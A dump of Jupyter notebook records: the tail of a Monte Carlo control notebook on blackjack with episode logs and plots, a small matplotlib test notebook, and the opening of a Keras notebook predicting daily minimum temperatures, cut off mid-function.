-1)]\n---t=0 St, At, Rt+1: ((18, 1, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 3: [((20, 10, False), 0, 1)]\n---t=0 St, At, Rt+1: ((20, 10, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 4: [((20, 6, False), 0, 1)]\n---t=0 St, At, Rt+1: ((20, 6, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 5: [((15, 3, True), 1, 0), ((15, 3, False), 0, -1)]\n---t=1 St, At, Rt+1: ((15, 3, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n---t=0 St, At, Rt+1: ((15, 3, True), 1, 0)\nG: -1.0\nC[St][At]: 2.0\nQ[St][At]: -1.0\n\nepisode 6: [((13, 4, False), 0, 1)]\n---t=0 St, At, Rt+1: ((13, 4, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 7: [((14, 9, False), 0, -1)]\n---t=0 St, At, Rt+1: ((14, 9, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 8: [((17, 10, False), 1, -1)]\n---t=0 St, At, Rt+1: ((17, 10, False), 1, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\n\nepisode 9: [((16, 7, False), 0, -1)]\n---t=0 St, At, Rt+1: ((16, 7, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 10: [((20, 6, False), 1, 0), ((21, 6, False), 0, 0)]\n---t=1 St, At, Rt+1: ((21, 6, False), 0, 0)\nG: 0.0\nC[St][At]: 1.0\nQ[St][At]: 0.0\nW: 2.0, b(St)[At]: 0.5\n---t=0 St, At, Rt+1: ((20, 6, False), 1, 0)\nG: 0.0\nC[St][At]: 2.0\nQ[St][At]: 0.0\n\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\"G_sum: defaultdict(<class 'float'>, {})\"\n\"G_count: defaultdict(<class 'float'>, {})\"\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nmonitored_state_action_values: defaultdict(<class 'list'>, {((21, 7, False), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((20, 7, True), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((12, 7, False), 1): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((17, 7, True), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]})\n" ], [ "Q", "_____no_output_____" ], [ "Q[(13, 5, False)]", "_____no_output_____" ], [ "pi", "_____no_output_____" ], [ "pi[(18, 4, False)]", "_____no_output_____" ], [ "V = defaultdict(float)\nfor state, actions in Q.items():\n action_value = np.max(actions)\n V[state] = action_value", "_____no_output_____" ], [ "V", "_____no_output_____" ], [ "print(monitored_state_actions[0])\nprint(monitored_state_action_values[monitored_state_actions[0]])", "((21, 7, False), 0)\n[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values[msa][-1], Q[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: ((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ] ], [ [ "### 5.5 Run 1\n\nFirst, we will run the algorithm for 10,000 episodes, using policy1:", "_____no_output_____" ] ], [ [ "Q1,pi1,monitored_state_action_values1 = mc_control(\n env, \n n_episodes=10_000, \n monitored_state_actions=monitored_state_actions,\n diag=False)", "Episode 10000/10000" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values1[msa][-1], Q1[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: ((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ] ], [ [ "The following chart shows how the values of the 4 monitored state-actions converge to their values:", "_____no_output_____" ] ], [ [ "plt.rcParams[\"figure.figsize\"] = (18,10)\nfor msa in monitored_state_actions:\n plt.plot(monitored_state_action_values1[msa])\nplt.title('Estimated $q_\\pi(s,a)$ for some state-actions', fontsize=18)\nplt.xlabel('Episodes', fontsize=16)\nplt.ylabel('Estimated $q_\\pi(s,a)$', fontsize=16)\nplt.legend(monitored_state_actions, fontsize=16)\nplt.show()", "_____no_output_____" ] ], [ [ "The following charts shows the estimate of the associated estimated optimal state-value function, $v_*(s)$, for the cases of a usable ace as well as not a usable ace. First, we compute ```V1``` which is the estimate for $v_*(s)$:", "_____no_output_____" ] ], [ [ "V1 = defaultdict(float)\nfor state, actions in Q1.items():\n action_value = np.max(actions)\n V1[state] = action_value", "_____no_output_____" ], [ "AZIM = -110\nELEV = 20", "_____no_output_____" ], [ "myplot.plot_pi_star_and_v_star(pi1, V1, title=\"$\\pi_* and v_*$\", wireframe=False, azim=AZIM-40, elev=ELEV);", "_____no_output_____" ] ], [ [ "### 5.6 Run 2\n\nOur final run uses 500,000 episodes and the accuracy of the action-value function is higher.", "_____no_output_____" ] ], [ [ "Q2,pi2,monitored_state_action_values2 = mc_control(\n env, \n n_episodes=500_000, \n monitored_state_actions=monitored_state_actions,\n diag=False)", "Episode 500000/500000" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values2[msa][-1], Q2[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: ((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ], [ "plt.rcParams[\"figure.figsize\"] = (18,12)\nfor msa in monitored_state_actions:\n plt.plot(monitored_state_action_values2[msa])\nplt.title('Estimated $q_\\pi(s,a)$ for some state-actions', fontsize=18)\nplt.xlabel('Episodes', fontsize=16)\nplt.ylabel('Estimated $q_\\pi(s,a)$', fontsize=16)\nplt.legend(monitored_state_actions, fontsize=16)\nplt.show()", "_____no_output_____" ], [ "V2 = defaultdict(float)\nfor state, actions in Q2.items():\n action_value = np.max(actions)\n V2[state] = action_value", "_____no_output_____" ], [ "# myplot.plot_action_value_function(Q2, title=\"500,000 Steps\", wireframe=True, azim=AZIM, elev=ELEV)\nmyplot.plot_pi_star_and_v_star(pi2, V2, title=\"$\\pi_* and v_*$\", wireframe=False, azim=AZIM-40, elev=ELEV);", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb2079138b6972e127c3b43fed16b878f1fe4acb
95,700
ipynb
Jupyter Notebook
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
765.6
42,533
0.73279
[ [ [ "### Welcome\n\nThis cell contains text. You can also apply **Markdown** formatting to it. \n\nThe next cells contain Python code, which runs interactively. \n\nEnjoy!", "_____no_output_____" ] ], [ [ "mylist = list(range(10))\nassert len(mylist) == 10\nprint(mylist)\n", "[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n" ], [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport random\nplt.plot(range(random.randint(5,20)))\nplt.ylabel('some numbers on the y-axis')\nplt.xlabel('some numbers on the x-axis')\nprint(\"Let's plot\")", "Let's plot\n" ], [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nx, y = np.mgrid[-2:2:500j, -2:2:500j]\nz = (x**2 + y**2 - 1)**3 - x**2 * y**3\nplt.contourf(x, y, z, levels=[-1, 0], colors=[\"red\"])\nplt.gca().set_aspect(\"equal\");", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code" ] ]
cb207ce028e0c1748f687b6e00ffe7a36f75fc78
1,033,273
ipynb
Jupyter Notebook
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
981.265907
430,474
0.936928
[ [ [ "import pandas as pd\nfrom sklearn.model_selection import train_test_split\n'''\nNOTE: This was done in Google Colab\n\nThe data (Minimum Daily Temperatures Dataset) is from \nJason Brownlee's \"7 Time Series Datasets for Machine Learning\" article:\nhttps://machinelearningmastery.com/time-series-datasets-for-machine-learning/\n\nHis datasets are found at:\nhttps://github.com/jbrownlee/Datasets\n\nThis specific data is found at:\nhttps://github.com/jbrownlee/Datasets/blob/master/daily-min-temperatures.csv\n\nIt is also found at:\nhttps://www.kaggle.com/paulbrabban/daily-minimum-temperatures-in-melbourne/\n'''\n#Obtain Data:\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\ntrain, test = train_test_split(df,test_size=0.25)\ntrain_x, train_y = train[['Date']], train[['Temp']]\ntest_x,train_y = test[['Date']], test[['Temp']]\n", "_____no_output_____" ], [ "'''\nNaive approach\n-Convert Date into Year,Month,Days. These should become one-hot variables.\n-Suppose the idea of years is not in this model.\n-The idea is that the model notices that winter months should be colder than summer months.\n'''\nimport tensorflow as tf\nimport tensorflow.keras\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\ndef build_model():\n model = Sequential([\n layers.Flatten(input_shape=(43,)),\n layers.Dropout(0.5),\n layers.Dense(43,activation='relu'),\n layers.Dropout(0.5),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])\n\n return model\n\ndef convertDates(df):\n dateConverted = df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),\n lambda d : d.Date[:4],\n lambda d : d.Date[5:7],\n lambda d : d.Date[8:]\n ],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)\n\n #One Hot conversion for dates\n for c in ['Month','Day']:\n oneHot = pd.get_dummies(dateConverted[c],prefix=c)\n dateConverted = dateConverted.drop(c,axis=1)\n dateConverted = dateConverted.join(oneHot)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnew_dates, new_temp = massageData(df)\n\n\ntrain_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)\nmodel = build_model()\nmodel.fit(train_x,train_y,epochs=80,validation_split=0.2)\nmodel.evaluate(test_x,test_y,verbose=1)\n'''\nThe naive approach seems to think more in terms of averages rather than actual predictions.\nAlso, the predictions, once outside the range of years, may become wildly inaccurate.\n'''\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\n\nconvertedDates = convertDates(df)\npredicted1 = pd.DataFrame(model.predict(convertedDates[convertedDates.columns[2:]]),columns=['PredictedTemp1'])\ntemps = predicted1.join(pd.DataFrame(normalizeTemp(df[['Temp']]),columns=['TrueValue']))\ndatetimeToTemp = convertedDates[['Datetime']].join(temps)\n\ndatetimeToTemp.plot('Datetime',figsize=(30,10))\ndatetimeToTemp", "Epoch 1/80\n69/69 [==============================] - 0s 3ms/step - loss: 0.1688 - mae: 0.3320 - mse: 0.1688 - val_loss: 0.0462 - val_mae: 0.1729 - val_mse: 0.0462\nEpoch 2/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0971 - mae: 0.2498 - mse: 0.0971 - val_loss: 0.0283 - val_mae: 0.1337 - val_mse: 0.0283\nEpoch 3/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0665 - mae: 0.2031 - mse: 0.0665 - val_loss: 0.0263 - val_mae: 0.1289 - val_mse: 0.0263\nEpoch 4/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0553 - mae: 0.1844 - mse: 0.0553 - val_loss: 0.0227 - val_mae: 0.1193 - val_mse: 0.0227\nEpoch 5/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0499 - mae: 0.1756 - mse: 0.0499 - val_loss: 0.0213 - val_mae: 0.1156 - val_mse: 0.0213\nEpoch 6/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0396 - mae: 0.1557 - mse: 0.0396 - val_loss: 0.0213 - val_mae: 0.1156 - val_mse: 0.0213\nEpoch 7/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0340 - mae: 0.1439 - mse: 0.0340 - val_loss: 0.0194 - val_mae: 0.1100 - val_mse: 0.0194\nEpoch 8/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0317 - mae: 0.1403 - mse: 0.0317 - val_loss: 0.0177 - val_mae: 0.1047 - val_mse: 0.0177\nEpoch 9/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0280 - mae: 0.1318 - mse: 0.0280 - val_loss: 0.0192 - val_mae: 0.1093 - val_mse: 0.0192\nEpoch 10/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0259 - mae: 0.1270 - mse: 0.0259 - val_loss: 0.0178 - val_mae: 0.1050 - val_mse: 0.0178\nEpoch 11/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0249 - mae: 0.1248 - mse: 0.0249 - val_loss: 0.0165 - val_mae: 0.1006 - val_mse: 0.0165\nEpoch 12/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0241 - mae: 0.1226 - mse: 0.0241 - val_loss: 0.0172 - val_mae: 0.1033 - val_mse: 0.0172\nEpoch 13/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0223 - mae: 0.1183 - mse: 0.0223 - val_loss: 0.0163 - val_mae: 0.1001 - val_mse: 0.0163\nEpoch 14/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0221 - mae: 0.1175 - mse: 0.0221 - val_loss: 0.0165 - val_mae: 0.1007 - val_mse: 0.0165\nEpoch 15/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0218 - mae: 0.1159 - mse: 0.0218 - val_loss: 0.0164 - val_mae: 0.1005 - val_mse: 0.0164\nEpoch 16/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0217 - mae: 0.1157 - mse: 0.0217 - val_loss: 0.0163 - val_mae: 0.1003 - val_mse: 0.0163\nEpoch 17/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0211 - mae: 0.1142 - mse: 0.0211 - val_loss: 0.0169 - val_mae: 0.1021 - val_mse: 0.0169\nEpoch 18/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0212 - mae: 0.1163 - mse: 0.0212 - val_loss: 0.0166 - val_mae: 0.1011 - val_mse: 0.0166\nEpoch 19/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0203 - mae: 0.1124 - mse: 0.0203 - val_loss: 0.0160 - val_mae: 0.0994 - val_mse: 0.0160\nEpoch 20/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0197 - mae: 0.1105 - mse: 0.0197 - val_loss: 0.0162 - val_mae: 0.1000 - val_mse: 0.0162\nEpoch 21/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0199 - mae: 0.1115 - mse: 0.0199 - val_loss: 0.0155 - val_mae: 0.0977 - val_mse: 0.0155\nEpoch 22/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0195 - mae: 0.1096 - mse: 0.0195 - val_loss: 0.0152 - val_mae: 0.0966 - val_mse: 0.0152\nEpoch 23/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0196 - mae: 0.1104 - mse: 0.0196 - val_loss: 0.0153 - val_mae: 0.0967 - val_mse: 0.0153\nEpoch 24/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0201 - mae: 0.1115 - mse: 0.0201 - val_loss: 0.0155 - val_mae: 0.0975 - val_mse: 0.0155\nEpoch 25/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1082 - mse: 0.0191 - val_loss: 0.0152 - val_mae: 0.0965 - val_mse: 0.0152\nEpoch 26/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1091 - mse: 0.0191 - val_loss: 0.0150 - val_mae: 0.0961 - val_mse: 0.0150\nEpoch 27/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1092 - mse: 0.0191 - val_loss: 0.0158 - val_mae: 0.0988 - val_mse: 0.0158\nEpoch 28/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0189 - mae: 0.1080 - mse: 0.0189 - val_loss: 0.0156 - val_mae: 0.0979 - val_mse: 0.0156\nEpoch 29/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1073 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 30/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1081 - mse: 0.0188 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 31/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1082 - mse: 0.0190 - val_loss: 0.0148 - val_mae: 0.0952 - val_mse: 0.0148\nEpoch 32/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1088 - mse: 0.0190 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 33/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1082 - mse: 0.0191 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 34/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1088 - mse: 0.0188 - val_loss: 0.0152 - val_mae: 0.0965 - val_mse: 0.0152\nEpoch 35/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1084 - mse: 0.0187 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 36/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0193 - mae: 0.1091 - mse: 0.0193 - val_loss: 0.0149 - val_mae: 0.0957 - val_mse: 0.0149\nEpoch 37/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1071 - mse: 0.0182 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 38/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1088 - mse: 0.0186 - val_loss: 0.0144 - val_mae: 0.0940 - val_mse: 0.0144\nEpoch 39/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1079 - mse: 0.0190 - val_loss: 0.0156 - val_mae: 0.0981 - val_mse: 0.0156\nEpoch 40/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1072 - mse: 0.0185 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 41/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1090 - mse: 0.0190 - val_loss: 0.0152 - val_mae: 0.0968 - val_mse: 0.0152\nEpoch 42/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1067 - mse: 0.0182 - val_loss: 0.0146 - val_mae: 0.0946 - val_mse: 0.0146\nEpoch 43/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1075 - mse: 0.0187 - val_loss: 0.0150 - val_mae: 0.0962 - val_mse: 0.0150\nEpoch 44/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1068 - mse: 0.0184 - val_loss: 0.0150 - val_mae: 0.0959 - val_mse: 0.0150\nEpoch 45/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1077 - mse: 0.0184 - val_loss: 0.0144 - val_mae: 0.0941 - val_mse: 0.0144\nEpoch 46/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1065 - mse: 0.0183 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 47/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1071 - mse: 0.0185 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 48/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1083 - mse: 0.0190 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 49/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1080 - mse: 0.0186 - val_loss: 0.0147 - val_mae: 0.0950 - val_mse: 0.0147\nEpoch 50/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1081 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 51/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1060 - mse: 0.0185 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 52/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1072 - mse: 0.0182 - val_loss: 0.0147 - val_mae: 0.0950 - val_mse: 0.0147\nEpoch 53/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1073 - mse: 0.0185 - val_loss: 0.0156 - val_mae: 0.0983 - val_mse: 0.0156\nEpoch 54/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1071 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 55/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0180 - mae: 0.1062 - mse: 0.0180 - val_loss: 0.0147 - val_mae: 0.0953 - val_mse: 0.0147\nEpoch 56/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1077 - mse: 0.0188 - val_loss: 0.0152 - val_mae: 0.0970 - val_mse: 0.0152\nEpoch 57/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1070 - mse: 0.0184 - val_loss: 0.0146 - val_mae: 0.0947 - val_mse: 0.0146\nEpoch 58/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0176 - mae: 0.1041 - mse: 0.0176 - val_loss: 0.0144 - val_mae: 0.0941 - val_mse: 0.0144\nEpoch 59/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1054 - mse: 0.0179 - val_loss: 0.0151 - val_mae: 0.0963 - val_mse: 0.0151\nEpoch 60/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1055 - mse: 0.0179 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 61/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1073 - mse: 0.0184 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 62/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1070 - mse: 0.0184 - val_loss: 0.0156 - val_mae: 0.0980 - val_mse: 0.0156\nEpoch 63/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1077 - mse: 0.0186 - val_loss: 0.0147 - val_mae: 0.0953 - val_mse: 0.0147\nEpoch 64/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0181 - mae: 0.1063 - mse: 0.0181 - val_loss: 0.0147 - val_mae: 0.0948 - val_mse: 0.0147\nEpoch 65/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1072 - mse: 0.0185 - val_loss: 0.0152 - val_mae: 0.0969 - val_mse: 0.0152\nEpoch 66/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1068 - mse: 0.0185 - val_loss: 0.0146 - val_mae: 0.0946 - val_mse: 0.0146\nEpoch 67/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1047 - mse: 0.0179 - val_loss: 0.0144 - val_mae: 0.0939 - val_mse: 0.0144\nEpoch 68/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1074 - mse: 0.0186 - val_loss: 0.0148 - val_mae: 0.0956 - val_mse: 0.0148\nEpoch 69/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1079 - mse: 0.0185 - val_loss: 0.0148 - val_mae: 0.0954 - val_mse: 0.0148\nEpoch 70/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1063 - mse: 0.0184 - val_loss: 0.0150 - val_mae: 0.0961 - val_mse: 0.0150\nEpoch 71/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1057 - mse: 0.0182 - val_loss: 0.0152 - val_mae: 0.0968 - val_mse: 0.0152\nEpoch 72/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1070 - mse: 0.0183 - val_loss: 0.0142 - val_mae: 0.0933 - val_mse: 0.0142\nEpoch 73/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1078 - mse: 0.0187 - val_loss: 0.0152 - val_mae: 0.0966 - val_mse: 0.0152\nEpoch 74/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1070 - mse: 0.0182 - val_loss: 0.0147 - val_mae: 0.0952 - val_mse: 0.0147\nEpoch 75/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1067 - mse: 0.0183 - val_loss: 0.0150 - val_mae: 0.0962 - val_mse: 0.0150\nEpoch 76/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1057 - mse: 0.0179 - val_loss: 0.0152 - val_mae: 0.0970 - val_mse: 0.0152\nEpoch 77/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1060 - mse: 0.0183 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 78/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0180 - mae: 0.1064 - mse: 0.0180 - val_loss: 0.0143 - val_mae: 0.0937 - val_mse: 0.0143\nEpoch 79/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1070 - mse: 0.0183 - val_loss: 0.0150 - val_mae: 0.0963 - val_mse: 0.0150\nEpoch 80/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1064 - mse: 0.0182 - val_loss: 0.0151 - val_mae: 0.0967 - val_mse: 0.0151\n29/29 [==============================] - 0s 1ms/step - loss: 0.0168 - mae: 0.1010 - mse: 0.0168\n" ], [ "'''\nLess Naive approach? (AKA, \"featurize the past?\")\n-Convert Date into Year,Month,Days. These should become one-hot variables.\n-Suppose the idea of years is not in this model.\n-Add a feature column that contains the previous 30 days of temperatures.\n-The idea is that previous days can affect the next.\n'''\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\ndef build_model():\n model = Sequential([\n layers.Flatten(input_shape=(73,)),\n layers.Dropout(0.5),\n layers.Dense(73,activation='relu'),\n layers.Dropout(0.5),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])\n\n return model\n\ndef convertDates(df):\n dateConverted = df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),\n lambda d : d.Date[:4],\n lambda d : d.Date[5:7],\n lambda d : d.Date[8:]\n ],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)\n\n #One Hot conversion for dates\n for c in ['Month','Day']:\n 